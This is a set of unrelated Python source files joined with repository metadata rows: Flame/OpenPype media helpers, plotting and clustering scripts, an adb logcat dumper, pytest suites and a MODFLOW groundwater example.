project_desktop = project.current_workspace.desktop
for reel_group in project_desktop.reel_groups:
for reel in reel_group.reels:
for clip in reel.clips:
clip_data = {
"PyClip": clip,
"fps": float(str(clip.frame_rate)[:-4])
}
attrs = [
"name", "width", "height",
"ratio", "sample_rate", "bit_depth"
]
for attr in attrs:
val = getattr(clip, attr)
clip_data[attr] = val
version = clip.versions[-1]
track = version.tracks[-1]
for segment in track.segments:
segment_data = get_segment_attributes(segment)
clip_data.update(segment_data)
output_clips.append(clip_data)
return output_clips
def get_reformated_filename(filename, padded=True):
"""
Return fixed python expression path
Args:
filename (str): file name
Returns:
type: string with reformated path
Example:
get_reformated_filename("plate.1001.exr") > plate.%04d.exr
"""
found = FRAME_PATTERN.search(filename)
if not found:
log.info("File name is not sequence: {}".format(filename))
return filename
padding = get_padding_from_filename(filename)
replacement = "%0{}d".format(padding) if padded else "%d"
start_idx, end_idx = found.span(1)
return replacement.join(
[filename[:start_idx], filename[end_idx:]]
)
def get_padding_from_filename(filename):
"""
Return padding number from Flame path style
Args:
filename (str): file name
Returns:
int: padding number
Example:
get_padding_from_filename("plate.0001.exr") > 4
"""
found = get_frame_from_filename(filename)
return len(found) if found else None
def get_frame_from_filename(filename):
"""
Return sequence number from Flame path style
Args:
filename (str): file name
Returns:
int: sequence frame number
Example:
def get_frame_from_filename(path):
("plate.0001.exr") > 0001
"""
found = re.findall(FRAME_PATTERN, filename)
return found.pop() if found else None
@contextlib.contextmanager
def maintained_object_duplication(item):
"""Maintain input item duplication
Attributes:
item (any flame.PyObject): python api object
Yield:
duplicate input PyObject type
"""
import flame
# Duplicate the clip to avoid modifying the original clip
duplicate = flame.duplicate(item)
try:
# do the operation on selected segments
yield duplicate
finally:
# delete the item at the end
flame.delete(duplicate)
@contextlib.contextmanager
def maintained_temp_file_path(suffix=None):
_suffix = suffix or ""
try:
# Store dumped json to temporary file
temporary_file = tempfile.mktemp(
suffix=_suffix, prefix="flame_maintained_")
yield temporary_file.replace("\\", "/")
except IOError as _error:
raise IOError(
"Not able to create temp json file: {}".format(_error))
finally:
# Remove the temporary json
os.remove(temporary_file)
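# Minimal usage sketch for the context manager above (hypothetical suffix
# and contents; the temporary file is removed automatically on exit):
#
#   with maintained_temp_file_path(".json") as tmp_path:
#       with open(tmp_path, "w") as f:
#           json.dump({"key": "value"}, f)
#       # ... hand tmp_path to an external tool here ...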
def get_clip_segment(flame_clip):
name = flame_clip.name.get_value()
version = flame_clip.versions[0]
track = version.tracks[0]
segments = track.segments
if len(segments) < 1:
raise ValueError("Clip `{}` has no segments!".format(name))
if len(segments) > 1:
raise ValueError("Clip `{}` has too many segments!".format(name))
return segments[0]
def get_batch_group_from_desktop(name):
project = get_current_project()
project_desktop = project.current_workspace.desktop
for bgroup in project_desktop.batch_groups:
if bgroup.name.get_value() in name:
return bgroup
class MediaInfoFile(object):
"""Class to get media info file clip data
Raises:
IOError: MEDIA_SCRIPT_PATH path doesn't exists
TypeError: Not able to generate clip xml data file
ET.ParseError: Missing clip in xml clip data
IOError: Not able to save xml clip data to file
Attributes:
str: `MEDIA_SCRIPT_PATH` path to flame binary
logging.Logger: `log` logger
TODO: add method for getting metadata to dict
"""
MEDIA_SCRIPT_PATH = "/opt/Autodesk/mio/current/dl_get_media_info"
log = log
_clip_data = None
_start_frame = None
_fps = None
_drop_mode = None
def __init__(self, path, **kwargs):
# replace log if any
if kwargs.get("logger"):
self.log = kwargs["logger"]
        # test if `dl_get_media_info` path exists
self._validate_media_script_path()
# derivate other feed variables
self.feed_basename = os.path.basename(path)
self.feed_dir = os.path.dirname(path)
self.feed_ext = os.path.splitext(self.feed_basename)[1][1:].lower()
with maintained_temp_file_path(".clip") as tmp_path:
self.log.info("Temp File: {}".format(tmp_path))
self._generate_media_info_file(tmp_path)
# get clip data and make them single if there is multiple
# clips data
xml_data = self._make_single_clip_media_info(tmp_path)
self.log.debug("xml_data: {}".format(xml_data))
self.log.debug("type: {}".format(type(xml_data)))
# get all time related data and assign them
self._get_time_info_from_origin(xml_data)
self.log.debug("start_frame: {}".format(self.start_frame))
self.log.debug("fps: {}".format(self.fps))
self.log.debug("drop frame: {}".format(self.drop_mode))
self.clip_data = xml_data
@property
def clip_data(self):
"""Clip's xml clip data
Returns:
xml.etree.ElementTree: xml data
"""
return self._clip_data
@clip_data.setter
def clip_data(self, data):
self._clip_data = data
@property
def start_frame(self):
""" Clip's starting frame found in timecode
Returns:
int: number of frames
"""
return self._start_frame
@start_frame.setter
def start_frame(self, number):
self._start_frame = int(number)
@property
def fps(self):
""" Clip's frame rate
Returns:
float: frame rate
"""
return self._fps
@fps.setter
def fps(self, fl_number):
self._fps = float(fl_number)
@property
def drop_mode(self):
""" Clip's drop frame mode
Returns:
str: drop frame flag
"""
return self._drop_mode
@drop_mode.setter
def drop_mode(self, text):
self._drop_mode = str(text)
def _validate_media_script_path(self):
if not os.path.isfile(self.MEDIA_SCRIPT_PATH):
raise IOError("Media Scirpt does not exist: `{}`".format(
self.MEDIA_SCRIPT_PATH))
def _generate_media_info_file(self, fpath):
        # Create cmd arguments for getting the xml media info file
cmd_args = [
self.MEDIA_SCRIPT_PATH,
"-e", self.feed_ext,
"-o", fpath,
self.feed_dir
]
try:
# execute creation of clip xml template data
openpype.run_subprocess(cmd_args)
except TypeError as error:
raise TypeError(
"Error creating `{}` due: {}".format(fpath, error))
def _make_single_clip_media_info(self, fpath):
with open(fpath) as f:
lines = f.readlines()
_added_root = itertools.chain(
"<root>", deepcopy(lines)[1:], "</root>")
new_root = ET.fromstringlist(_added_root)
# find the clip which is matching to my input name
xml_clips = new_root.findall("clip")
matching_clip = None
for xml_clip in xml_clips:
if xml_clip.find("name").text in self.feed_basename:
matching_clip = xml_clip
if matching_clip is None:
# return warning there is missing clip
raise ET.ParseError(
"Missing clip in `{}`. Available clips {}".format(
self.feed_basename, [
xml_clip.find("name").text
for xml_clip in xml_clips
]
))
return matching_clip
def _get_time_info_from_origin(self, xml_data):
try:
for out_track in xml_data.iter('track'):
for out_feed in out_track.iter('feed'):
# start frame
out_feed_nb_ticks_obj = out_feed.find(
'startTimecode/nbTicks')
self.start_frame = out_feed_nb_ticks_obj.text
# fps
out_feed_fps_obj = out_feed.find(
'startTimecode/rate')
self.fps = out_feed_fps_obj.text
# drop frame mode
out_feed_drop_mode_obj = out_feed.find(
'startTimecode/dropMode')
self.drop_mode = out_feed_drop_mode_obj.text
break
else:
continue
except Exception as msg:
self.log.warning(msg)
@staticmethod
def write_clip_data_to_file(fpath, xml_element_data):
""" Write xml element of clip data to file
Args:
fpath (string): file path
xml_element_data (xml.etree.ElementTree.Element): xml data
Raises:
IOError: If data could not be written to file
"""
try:
# save it as new file
tree = cET.ElementTree(xml_element_data)
tree.write(
fpath, xml_declaration=True,
method='xml', encoding='UTF-8'
)
except IOError as error:
raise IOError(
"Not able to write data to file: {}".format(error))
| 29.109458 | 79 | 0.593531 | 13,810 | 0.504162 | 2,053 | 0.074949 | 3,960 | 0.144568 | 0 | 0 | 6,952 | 0.253797 |
c7c5220186916c25d94c94c265afef27d8cdfced | 1,287 | py | Python | newanalysis/plot_performances.py | nriesterer/cogsci-individualization | da97bf0a6b53f440670e22ff591348f3d3fab230 | [
"MIT"
]
| null | null | null | newanalysis/plot_performances.py | nriesterer/cogsci-individualization | da97bf0a6b53f440670e22ff591348f3d3fab230 | [
"MIT"
]
| null | null | null | newanalysis/plot_performances.py | nriesterer/cogsci-individualization | da97bf0a6b53f440670e22ff591348f3d3fab230 | [
"MIT"
]
| null | null | null | import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
if len(sys.argv) != 3:
print('usage: python plot_performances.py <group_csv> <indiv_csv>')
exit()
group_file = sys.argv[1]
indiv_file = sys.argv[2]
# Load the data
df_group = pd.read_csv(group_file)
df_indiv = pd.read_csv(indiv_file)
df = pd.concat([df_group, df_indiv], sort=True)
# Prepare the data for plotting
plot_df = df.groupby(['model', 'id'], as_index=False)['hit'].agg('mean')
mfa_df = plot_df.loc[plot_df['model'] == 'MFA']
mfa_median = mfa_df['hit'].median()
plot_df = plot_df.loc[plot_df['model'] != 'MFA']
# Plot the data
sns.set(style='whitegrid', palette='colorblind')
plt.figure(figsize=(7, 3))
order = plot_df.groupby('model', as_index=False)['hit'].agg('median').sort_values('hit')['model']
colors = [('C0' if 'mReasoner' in x else 'C2') for x in order]
sns.boxplot(x='model', y='hit', data=plot_df, order=order, palette=colors)
plt.axhline(y=mfa_median, ls='--', color='C7', zorder=10)
plt.text(0.002, mfa_median + 0.015, 'MFA', color='C7', fontsize=10, transform=plt.gca().transAxes)
plt.xlabel('')
plt.yticks(np.arange(0, 1.1, 0.1))
plt.ylabel('Coverage Accuracy')
plt.tight_layout()
plt.savefig('visualizations/performances.pdf')
plt.show()
| 28.6 | 98 | 0.700855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 329 | 0.255633 |
c7c52b0c2a58b302536c4281e3d875f7998a6140 | 611 | py | Python | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
]
| null | null | null | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
]
| null | null | null | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
]
| null | null | null | from Aion.utils.data import getADBPath
import subprocess
def dumpLogCat(apkTarget):
# Aion/shared/DroidutanTest.py
# Define frequently-used commands
# TODO: Refactor adbID
adbID = "192.168.58.101:5555"
adbPath = getADBPath()
dumpLogcatCmd = [adbPath, "-s", adbID, "logcat", "-d"]
    clearLogcatCmd = [adbPath, "-s", adbID, "logcat", "-c"]
# 5. Dump the system log to file
logcatFile = open(apkTarget.replace(".apk", ".log"), "w")
prettyPrint("Dumping logcat")
subprocess.Popen(dumpLogcatCmd, stderr=subprocess.STDOUT, stdout=logcatFile).communicate()[0]
logcatFile.close()
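# Example usage (illustrative path; any analyzed APK's path works):
#
#   dumpLogCat("/tmp/target_app.apk")
#
# which writes the device's current logcat buffer to /tmp/target_app.log.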
| 33.944444 | 97 | 0.680851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 194 | 0.317512 |
c7c5b3d53e6ad031199ab57c86f15523078de6cc | 1,969 | py | Python | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
]
| 6 | 2018-08-15T13:29:22.000Z | 2020-09-12T14:39:20.000Z | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
]
| 26 | 2018-08-15T13:08:49.000Z | 2020-01-12T22:27:38.000Z | tests/test_show.py | domi007/pigskin | c379284ebbbdb3a9df42de70227041e3c137b6dc | [
"MIT"
]
| 4 | 2018-08-15T13:52:26.000Z | 2019-04-28T17:09:04.000Z | from collections import OrderedDict
import pytest
import vcr
try: # Python 2.7
# requests's ``json()`` function returns strings as unicode (as per the
# JSON spec). In 2.7, those are of type unicode rather than str. basestring
# was created to help with that.
# https://docs.python.org/2/library/functions.html#basestring
basestring = basestring
except NameError:
basestring = str
@pytest.mark.incremental
class TestShow(object):
"""These don't require authentication to Game Pass."""
    @staticmethod
    @vcr.use_cassette('public_API/europe_show.yaml')
def test_desc(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            # content is not required, so desc may be empty/None
            assert show.desc is None or isinstance(show.desc, basestring)
    @staticmethod
    @vcr.use_cassette('public_API/europe_show.yaml')
def test_logo(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            assert isinstance(show.logo, basestring)
assert show.logo
    @staticmethod
    @vcr.use_cassette('public_API/europe_show.yaml')
def test_name(gp):
shows = gp.shows
for s in shows:
show = shows[s]
            assert isinstance(show.name, basestring)
assert show.name
    @staticmethod
    @vcr.use_cassette('public_API/europe_show_seasons.yaml')
def test_seasons(gp):
shows = gp.shows
for s in shows:
show = shows[s]
assert type(show.seasons) is OrderedDict
assert show.seasons
prev = 9999
for s in show.seasons:
season = show.seasons[s]
# TODO: assert it has content
# TODO: assert is type season
# make sure the years look sane-ish
assert int(s) > 2000 and int(s) < 2050
# make sure it's sorted high to low
assert int(prev) > int(s)
prev = s
| 24.6125 | 79 | 0.584053 | 1,532 | 0.77806 | 0 | 0 | 1,557 | 0.790757 | 0 | 0 | 582 | 0.295582 |
c7c66a8f8b52a73b0ced73b9208760d1628d3b03 | 3,165 | py | Python | integration_test/basic_op_capi.py | cl9200/nbase-arc | 47c124b11b0bb2e8a8428c6d628ce82dc24c1ade | [
"Apache-2.0"
]
| null | null | null | integration_test/basic_op_capi.py | cl9200/nbase-arc | 47c124b11b0bb2e8a8428c6d628ce82dc24c1ade | [
"Apache-2.0"
]
| null | null | null | integration_test/basic_op_capi.py | cl9200/nbase-arc | 47c124b11b0bb2e8a8428c6d628ce82dc24c1ade | [
"Apache-2.0"
]
| null | null | null | #
# Copyright 2015 Naver Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import unittest
import testbase
import default_cluster
import util
import os
import constant
import config
import time
import telnetlib
import signal
class TestBasicOpCAPI(unittest.TestCase):
cluster = config.clusters[2]
@classmethod
def setUpClass(cls):
return 0
@classmethod
def tearDownClass(cls):
return 0
def setUp(self):
util.set_process_logfile_prefix( 'TestBasicOp_%s' % self._testMethodName )
self.conf_checker = default_cluster.initialize_starting_up_smr_before_redis(self.cluster, arch=self.arch)
self.assertIsNotNone(self.conf_checker, 'failed to initialize cluster')
def tearDown(self):
testbase.defaultTearDown(self)
def run_capi_server(self):
# run capi test server
_capi_server_conf = """
zookeeper 127.0.0.1:2181
cluster_name %s
port 6200
daemonize no
num_conn_per_gw 2
init_timeout_millis 10000
log_level INFO
log_file_prefix "capi_server"
max_fd 4096
conn_reconnect_millis 1000
zk_reconnect_millis 1000
zk_session_timeout_millis 10000
local_proxy_query_timeout_millis 10000
""" % self.cluster['cluster_name']
old_cwd = os.path.abspath( os.getcwd() )
os.chdir(util.capi_dir(0))
f = open('capi_server.conf', 'w')
f.write(_capi_server_conf)
f.close()
os.chdir(old_cwd)
        if self.arch == 32:
cmd = "./%s capi_server.conf" % constant.CAPI32_TEST_SERVER
else:
cmd = "./%s capi_server.conf" % constant.CAPI_TEST_SERVER
capi_server = util.exec_proc_async(util.capi_dir(0),
cmd, True, None, subprocess.PIPE, None)
# ping check
while True:
try:
t = telnetlib.Telnet('127.0.0.1', 6200)
break
except:
time.sleep(1)
continue
t.write("ping\r\n")
t.read_until('+PONG\r\n')
t.close()
return capi_server
def stop_process(self, capi_server):
capi_server.send_signal(signal.SIGTERM)
capi_server.wait()
def test_basic_op_capi(self):
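        # Start the CAPI test server, run the redis gateway test suite against
        # it on port 6200, and require a clean (zero) exit status.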
capi_server = self.run_capi_server()
f = open("%s/test_basicop_output_capi%d" % (constant.logdir, self.arch), 'w')
p = util.exec_proc_async("../redis-%s" % constant.REDISVER,
"./runtest_gw --accurate --gw-port 6200",
True, None, f, None)
ret = p.wait()
f.close()
        self.assertEqual(0, ret)
self.stop_process(capi_server)
| 28.00885 | 113 | 0.653081 | 2,415 | 0.763033 | 0 | 0 | 111 | 0.035071 | 0 | 0 | 1,147 | 0.362401 |
c7c6a85099fcd6a3265a36a9b36bdf7fa4e9b9a7 | 5,509 | py | Python | examples/scripts/flopy_lake_example.py | andrewcalderwood/flopy | 0432ce96a0a5eec4d20adb4d384505632a2db3dc | [
"CC0-1.0",
"BSD-3-Clause"
]
| 351 | 2015-01-03T15:18:48.000Z | 2022-03-31T09:46:43.000Z | examples/scripts/flopy_lake_example.py | andrewcalderwood/flopy | 0432ce96a0a5eec4d20adb4d384505632a2db3dc | [
"CC0-1.0",
"BSD-3-Clause"
]
| 1,256 | 2015-01-15T21:10:42.000Z | 2022-03-31T22:43:06.000Z | examples/scripts/flopy_lake_example.py | andrewcalderwood/flopy | 0432ce96a0a5eec4d20adb4d384505632a2db3dc | [
"CC0-1.0",
"BSD-3-Clause"
]
| 553 | 2015-01-31T22:46:48.000Z | 2022-03-31T17:43:35.000Z | import os
import sys
import numpy as np
import matplotlib.pyplot as plt
import flopy
def run():
workspace = os.path.join("lake")
# make sure workspace directory exists
if not os.path.exists(workspace):
os.makedirs(workspace)
fext = "png"
narg = len(sys.argv)
iarg = 0
if narg > 1:
while iarg < narg - 1:
iarg += 1
basearg = sys.argv[iarg].lower()
if basearg == "--pdf":
fext = "pdf"
# save the starting path
cwdpth = os.getcwd()
# change to the working directory
os.chdir(workspace)
# We are creating a square model with a specified head equal to `h1` along all boundaries.
# The head at the cell in the center in the top layer is fixed to `h2`. First, set the name
# of the model and the parameters of the model: the number of layers `Nlay`, the number of rows
# and columns `N`, lengths of the sides of the model `L`, aquifer thickness `H`, hydraulic
# conductivity `Kh`
name = "lake_example"
h1 = 100
h2 = 90
Nlay = 10
N = 101
L = 400.0
H = 50.0
Kh = 1.0
# Create a MODFLOW model and store it (in this case in the variable `ml`, but you can call it
# whatever you want). The modelname will be the name given to all MODFLOW files (input and output).
# The exe_name should be the full path to your MODFLOW executable. The version is either 'mf2k'
# for MODFLOW2000 or 'mf2005'for MODFLOW2005.
ml = flopy.modflow.Modflow(
modelname=name, exe_name="mf2005", version="mf2005"
)
# Define the discretization of the model. All layers are given equal thickness. The `bot` array
    # is built from the `Hlay` values to indicate top and bottom of each layer, and `delrow` and
# `delcol` are computed from model size `L` and number of cells `N`. Once these are all computed,
# the Discretization file is built.
bot = np.linspace(-H / Nlay, -H, Nlay)
delrow = delcol = L / (N - 1)
dis = flopy.modflow.ModflowDis(
ml,
nlay=Nlay,
nrow=N,
ncol=N,
delr=delrow,
delc=delcol,
top=0.0,
botm=bot,
laycbd=0,
)
# Next we specify the boundary conditions and starting heads with the Basic package. The `ibound`
# array will be `1` in all cells in all layers, except for along the boundary and in the cell at
# the center in the top layer where it is set to `-1` to indicate fixed heads. The starting heads
# are used to define the heads in the fixed head cells (this is a steady simulation, so none of
# the other starting values matter). So we set the starting heads to `h1` everywhere, except for
# the head at the center of the model in the top layer.
Nhalf = int((N - 1) / 2)
ibound = np.ones((Nlay, N, N), dtype=int)
ibound[:, 0, :] = -1
ibound[:, -1, :] = -1
ibound[:, :, 0] = -1
ibound[:, :, -1] = -1
ibound[0, Nhalf, Nhalf] = -1
start = h1 * np.ones((N, N))
start[Nhalf, Nhalf] = h2
# create external ibound array and starting head files
files = []
hfile = f"{name}_strt.ref"
np.savetxt(hfile, start)
hfiles = []
for kdx in range(Nlay):
file = f"{name}_ib{kdx + 1:02d}.ref"
files.append(file)
hfiles.append(hfile)
np.savetxt(file, ibound[kdx, :, :], fmt="%5d")
bas = flopy.modflow.ModflowBas(ml, ibound=files, strt=hfiles)
# The aquifer properties (really only the hydraulic conductivity) are defined with the
# LPF package.
lpf = flopy.modflow.ModflowLpf(ml, hk=Kh)
# Finally, we need to specify the solver we want to use (PCG with default values), and the
# output control (using the default values). Then we are ready to write all MODFLOW input
# files and run MODFLOW.
pcg = flopy.modflow.ModflowPcg(ml)
oc = flopy.modflow.ModflowOc(ml)
ml.write_input()
ml.run_model()
# change back to the starting directory
os.chdir(cwdpth)
# Once the model has terminated normally, we can read the heads file. First, a link to the heads
# file is created with `HeadFile`. The link can then be accessed with the `get_data` function, by
# specifying, in this case, the step number and period number for which we want to retrieve data.
# A three-dimensional array is returned of size `nlay, nrow, ncol`. Matplotlib contouring functions
# are used to make contours of the layers or a cross-section.
hds = flopy.utils.HeadFile(os.path.join(workspace, f"{name}.hds"))
h = hds.get_data(kstpkper=(0, 0))
x = y = np.linspace(0, L, N)
c = plt.contour(x, y, h[0], np.arange(90, 100.1, 0.2))
plt.clabel(c, fmt="%2.1f")
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake1.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
x = y = np.linspace(0, L, N)
c = plt.contour(x, y, h[-1], np.arange(90, 100.1, 0.2))
plt.clabel(c, fmt="%1.1f")
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake2.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
z = np.linspace(-H / Nlay / 2, -H + H / Nlay / 2, Nlay)
c = plt.contour(x, z, h[:, 50, :], np.arange(90, 100.1, 0.2))
plt.axis("scaled")
outfig = os.path.join(workspace, f"lake3.{fext}")
fig = plt.gcf()
fig.savefig(outfig, dpi=300)
print("created...", outfig)
return 0
if __name__ == "__main__":
success = run()
| 35.089172 | 103 | 0.626429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,760 | 0.500998 |
c7c6afa7ba07a568b76988ebc296a4b468c42738 | 11,428 | py | Python | P2/Caso2/clustering.py | Ocete/Inteligenica-de-Negocio | 0c3bb3914893c608790002743530aba535be7249 | [
"MIT"
]
| null | null | null | P2/Caso2/clustering.py | Ocete/Inteligenica-de-Negocio | 0c3bb3914893c608790002743530aba535be7249 | [
"MIT"
]
| null | null | null | P2/Caso2/clustering.py | Ocete/Inteligenica-de-Negocio | 0c3bb3914893c608790002743530aba535be7249 | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
'''
Documentation on clustering in Python:
http://scikit-learn.org/stable/modules/clustering.html
http://www.learndatasci.com/k-means-clustering-algorithms-python-intro/
http://hdbscan.readthedocs.io/en/latest/comparing_clustering_algorithms.html
https://joernhees.de/blog/2015/08/26/scipy-hierarchical-clustering-and-dendrogram-tutorial/
'''
import time
import csv
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from sklearn import preprocessing
from sklearn import metrics
from sklearn import cluster
from math import floor
import seaborn as sns
# Nice plotting defaults
sns.set()
def norm_to_zero_one(df):
return (df - df.min()) * 1.0 / (df.max() - df.min())
censo = pd.read_csv('../mujeres_fecundidad_INE_2018.csv')
'''
for col in censo:
missing_count = sum(pd.isnull(censo[col]))
if missing_count > 0:
print(col,missing_count)
#'''
# Unknown values could be replaced with a fixed number
#censo = censo.replace(np.NaN,0)
# Replace missing values with the column mean
for col in censo:
censo[col].fillna(censo[col].mean(), inplace=True)
# Select cases
subset = censo.loc[(censo['TRAREPRO']==1) & (censo['NEMBTRAREPRO']<=6)]
# Select variables
usadas = ['NHIJOS', 'TIPOTRAREPRO', 'NMESESTRAREPRO', 'NEMBTRAREPRO']
X = subset[usadas]
X_normal = X.apply(norm_to_zero_one)
print('Population size after filtering: ',len(X_normal.index))
for col in X:
missing_count = sum(pd.isnull(censo[col]))
if missing_count > 0:
print(col,missing_count, ' AFTER')
algoritmos = (('KMeans', cluster.KMeans(init='k-means++', n_clusters=5, n_init=5)),
('MeanShift', cluster.MeanShift(cluster_all=False, min_bin_freq=3)),
('Ward', cluster.AgglomerativeClustering(n_clusters=4, linkage='ward')),
('DBScan', cluster.DBSCAN(eps=0.35, min_samples=5)),
('Birch', cluster.Birch(threshold=0.1,n_clusters=5)))
cluster_predict = {}
calinski = {}
silh = {}
times = {}
n_clusters = {}
clusters_fig, clusters_axis = plt.subplots(3, 2, figsize=(10,10))
clusters_colors = ['gold', 'yellowgreen', 'lightcoral', 'lightskyblue', '#ffb347']
ijs = [(0,0), (0,1), (1,0), (1,1), (2,0), (2,1)]
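# (row, col) subplot positions for each algorithm's bar chart in the 3x2 grid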
for i_alg, par in enumerate(algoritmos):
name, alg = par
    print('----- Running ' + name,)
t = time.time()
cluster_predict[name] = alg.fit_predict(X_normal)
tiempo = time.time() - t
times[name] = tiempo
metric_CH = metrics.calinski_harabasz_score(X_normal, cluster_predict[name])
calinski[name] = metric_CH
metric_SC = metrics.silhouette_score(X_normal, cluster_predict[name], metric='euclidean', sample_size=floor(len(X)), random_state=123456)
silh[name] = metric_SC
    # Assign the cluster labels to a DataFrame
clusters = pd.DataFrame(cluster_predict[name],index=X.index,columns=['cluster'])
if (name == 'KMeans'):
clusters_kmeans = clusters
alg_kmeans = alg
elif (name == 'Ward'):
clusters_ward = clusters
print("Tamaño de cada cluster:")
size = clusters['cluster'].value_counts()
cluster_fractions = []
for num,i in size.iteritems():
print('%s: %5d (%5.2f%%)' % (num,i,100*i/len(clusters)))
cluster_fractions.append( 100*i/len(clusters) )
n_clusters[name] = len(size)
# Bar charts
if ( len(cluster_fractions) > 7 ):
cluster_fractions = cluster_fractions[0:6]
i, j = ijs[i_alg]
y_pos = np.arange(len(cluster_fractions))
labels = [ "Cluster " + str(i) for i in range(len(cluster_fractions)) ]
clusters_axis[i, j].bar(y_pos, cluster_fractions, tick_label=labels, color=clusters_colors)
clusters_axis[i, j].set_ylim(0, 100)
clusters_axis[i, j].set_title(name)
if (j == 0):
clusters_axis[i, j].set_ylabel("Cluster size (%)")
clusters_axis[2,1].remove()
#clusters_fig.savefig("clusters.png")
plt.show()
from prettytable import PrettyTable
header = ['Algorithm', 'CH', 'Silh', 'Time', 'Number of clusters']
tabla = PrettyTable(header)
for name, alg in algoritmos:
tabla.add_row([name,
"{0:.2f}".format(calinski[name]),
"{0:.2f}".format(silh[name]),
"{0:.2f}".format(times[name]),
n_clusters[name]])
print(tabla)
# Write the results to general.csv
'''
with open('general.csv', mode='w+', newline='') as file:
    writer = csv.DictWriter(file, fieldnames=header)
    writer.writeheader()
    for name, _ in algoritmos:
        writer.writerow({'Algorithm': name,
            'CH': "{0:.2f}".format(calinski[name]),
            'Silh': "{0:.2f}".format(silh[name]),
            'Time': "{0:.2f}".format(times[name]),
            'Number of clusters': n_clusters[name]})
#'''
# ----------------------- DISTRIBUTION FUNCTIONS ---------
print("---------- Preparing distribution functions...")
n_clusters_ward = n_clusters['Ward']
n_var = len(usadas)
X_ward = pd.concat([X, clusters_ward], axis=1)
fig, axes = plt.subplots(n_clusters_ward, n_var, sharey=True, figsize=(15,15))
fig.subplots_adjust(wspace=0, hspace=0)
colors = sns.color_palette(palette=None, n_colors=n_clusters_ward, desat=None)
rango = []
for j in range(n_var):
rango.append([X_ward[usadas[j]].min(), X_ward[usadas[j]].max()])
for i in range(n_clusters_ward):
dat_filt = X_ward.loc[X_ward['cluster']==i]
for j in range(n_var):
#ax = sns.kdeplot(dat_filt[usadas[j]], label="", shade=True, color=colors[i], ax=axes[i,j])
ax = sns.boxplot(dat_filt[usadas[j]], color=colors[i], flierprops={'marker':'o','markersize':4}, ax=axes[i,j])
if (i==n_clusters_ward-1):
axes[i,j].set_xlabel(usadas[j])
else:
axes[i,j].set_xlabel("")
if (j==0):
axes[i,j].set_ylabel("Cluster "+str(i))
else:
axes[i,j].set_ylabel("")
axes[i,j].set_yticks([])
axes[i,j].grid(axis='x', linestyle='-', linewidth='0.2', color='gray')
axes[i,j].grid(axis='y', b=False)
ax.set_xlim(rango[j][0]-0.05*(rango[j][1]-rango[j][0]),rango[j][1]+0.05*(rango[j][1]-rango[j][0]))
plt.show()
#fig.savefig("boxes.png")
# ---------------- SCATTER MATRIX -----------------------
'''
plt.clf()
print("---------- Preparando el scatter matrix...")
# Se añade la asignación de clusters como columna a X
variables = list(X_ward)
variables.remove('cluster')
sns_plot = sns.pairplot(X_ward, vars=variables, hue="cluster", palette='Paired', plot_kws={"s": 25}, diag_kind="hist")
sns_plot.fig.subplots_adjust(wspace=.03, hspace=.03);
# sns_plot.savefig("scatter_matrix.png")
plt.show()
#'''
# ----------------------- DENDROGRAMS -----------------------
# In clustering we must normalize so the distance metrics make sense
# X_normal = preprocessing.normalize(X, norm='l2')
X_normal = (X - X.min() ) / (X.max() - X.min())
# We use this hierarchical clustering and keep 20 clusters, i.e. twenty branches of the dendrogram
ward = cluster.AgglomerativeClustering(n_clusters=20, linkage='ward')
name, algorithm = ('Ward', ward)
cluster_predict = {}
k = {}
t = time.time()
cluster_predict[name] = algorithm.fit_predict(X_normal)
tiempo = time.time() - t
k[name] = len(set(cluster_predict[name]))
# Convert the cluster assignment to a DataFrame
clusters = pd.DataFrame(cluster_predict['Ward'],index=X.index,columns=['cluster'])
# And add it as a column to X
X_cluster = pd.concat([X, clusters], axis=1)
# Filter out the elements (outliers) that fall into very small clusters in the hierarchical result
min_size = 3
X_filtrado = X
'''
X_cluster[X_cluster.groupby('cluster').cluster.transform(len) > min_size]
k_filtrado = len(set(X_filtrado['cluster']))
print("De los {:.0f} clusters hay {:.0f} con más de {:.0f} elementos. Del total de {:.0f} elementos, se seleccionan {:.0f}".format(k['Ward'],k_filtrado,min_size,len(X),len(X_filtrado)))
X_filtrado = X_filtrado.drop('cluster', 1)
X_filtrado = X
#'''
# Normalize the filtered set
X_filtrado_normal = preprocessing.normalize(X_filtrado, norm='l2')
# Obtain the dendrogram using scipy, which actually re-runs the hierarchical clustering
from scipy.cluster import hierarchy
linkage_array = hierarchy.ward(X_filtrado_normal)
plt.clf()
dendro = hierarchy.dendrogram(linkage_array,orientation='left', p=10, truncate_mode='lastp') # horizontal orientation, to compare it with the one generated by seaborn
# "p=10, truncate_mode='lastp'" can be used to cut the dendrogram down to 10 leaves
# Dendrogram using seaborn (which in turn uses scipy) to include a heatmap
X_filtrado_normal_DF = pd.DataFrame(X_filtrado_normal, index=X_filtrado.index, columns=usadas)
# Add a label column to indicate the cluster each object belongs to
labels = X_ward['cluster']
lut = dict(zip(set(labels), sns.color_palette(palette="Blues_d", n_colors=n_clusters_ward)))
row_colors = pd.DataFrame(labels)['cluster'].map(lut)
